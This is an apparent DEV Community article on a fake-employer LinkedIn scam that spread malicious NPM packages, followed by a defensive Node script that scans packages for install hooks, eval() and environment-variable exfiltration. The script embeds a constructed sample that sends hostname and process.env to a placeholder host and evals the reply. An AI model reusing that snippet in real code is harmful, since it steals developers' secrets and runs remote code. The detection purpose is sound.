
Fake Employer's NPM Supply Chain Attack Targets Developers

DEV Community

A developer was targeted by a fake employer on LinkedIn who distributed malware through a sophisticated NPM supply chain attack. The attacker posed as a CEO, offering a full-stack role, and directed the developer to a Bitbucket repository containing malicious packages like async-queuelite. The code was designed to steal environment variables and execute remote commands.

The attack unfolded over weeks, with the attacker repeatedly publishing new malicious packages after takedowns, including reqweaver and restpilot. The backdoor collected system info, exfiltrated data to a Vercel endpoint, and used eval() for remote code execution. Because the malicious logic is fetched at runtime and run through eval() rather than shipped in the published package, static analysis tools have little to flag, which makes this method particularly dangerous for unsuspecting developers.

The incident underscores a growing trend where attackers blend social engineering with supply chain vulnerabilities. While the developer avoided running the code, the persistence of the attacker, who shifted from NPM packages to embedded backdoors, highlights the need for caution when installing dependencies from unfamiliar sources. Reporting to NPM led to takedowns, but the threat remains active.

Developers should inspect unknown packages, use sandboxed environments, and validate unsolicited job offers. This case shows how targeted attacks can exploit the hiring process, turning a routine coding test into a security breach. Vigilance and proper vetting of dependencies are critical defenses against such evolving threats.
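As an added example (not code from the article or from the packages it names), the following Node script shows the kind of pre-install review the advice above calls for, keyed to the traits the article describes: install-time lifecycle scripts, eval() of fetched code, and process.env reads paired with outbound network calls. The package manifest and source text are constructed inline; the endpoint name is a placeholder, and the checks are heuristics that point a reviewer at what to read, not proof of safety.

```javascript
'use strict';

// Lifecycle hooks npm runs automatically on install, without the user asking.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];

// Return the install-time scripts a manifest would trigger, as "hook: command".
function installScripts(pkgJson) {
  const scripts = pkgJson.scripts || {};
  return LIFECYCLE.filter((k) => typeof scripts[k] === 'string')
    .map((k) => `${k}: ${scripts[k]}`);
}

// Source patterns for dynamic code execution, secret access, system
// fingerprinting and outbound traffic (regex heuristics, so expect misses
// on obfuscated code and false positives on legitimate tooling).
const CHECKS = {
  dynamicEval: /\beval\s*\(|new\s+Function\s*\(/,
  envAccess: /\bprocess\.env\b/,
  systemInfo: /\bos\.(?:hostname|userInfo|platform|networkInterfaces)\s*\(/,
  network: /\b(?:fetch|https?\.request|https?\.get|axios)\s*\(|require\(['"]https?['"]\)/,
};

// List which suspicious traits a source file exhibits. The combination of
// env access and a network call is the exfiltration shape from the article,
// so it is reported as its own finding.
function auditSource(src) {
  const found = Object.keys(CHECKS).filter((name) => CHECKS[name].test(src));
  if (found.includes('envAccess') && found.includes('network')) {
    found.push('envExfilShape');
  }
  return found;
}

// Constructed sample inputs (not taken from any real package).
const SAMPLE_PKG = { name: 'example-pkg', scripts: { postinstall: 'node setup.js' } };
const SAMPLE_SRC = `
const os = require('os');
const https = require('https');
const info = { host: os.hostname(), env: process.env };
https.request({ hostname: 'placeholder-endpoint.invalid', method: 'POST' }, (res) => {
  let body = ''; res.on('data', (d) => body += d); res.on('end', () => eval(body));
}).end(JSON.stringify(info));
`;

console.log('install scripts:', installScripts(SAMPLE_PKG));
console.log('source findings:', auditSource(SAMPLE_SRC));
```

Point the two functions at a freshly downloaded package's package.json and its entry file before running npm install, and treat any install hook or an envExfilShape hit as a reason to read that code in full inside a sandbox.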